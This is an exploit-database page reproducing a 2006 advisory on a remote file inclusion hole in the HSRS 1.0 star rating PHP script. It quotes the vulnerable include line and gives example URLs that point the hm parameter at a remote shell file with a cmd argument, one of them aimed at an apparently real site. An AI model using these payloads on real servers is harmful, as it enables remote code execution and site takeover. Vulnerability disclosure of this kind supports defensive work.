header-logo
Suggest Exploit
vendor:
HSRS
by:
CoLd Zero
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: HSRS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File Include Vulnerability

The HSRS 1.0 (HIOX Star Rating System Script) is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from remote servers.

Mitigation:

Update to a patched version of the script or apply appropriate input validation and sanitization to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php)  Remote File
Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            HSRS 1.0 (HIOX Star Rating System Script)
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-23
# Remote:    Yes
# Type:      High
# Site:      http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.

==========================

file ;

addcode.php

==========================

 include "$hm/auth/config.php";

======================================================
Example:

http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd

======================================================
Exploit :

Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd


======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-23]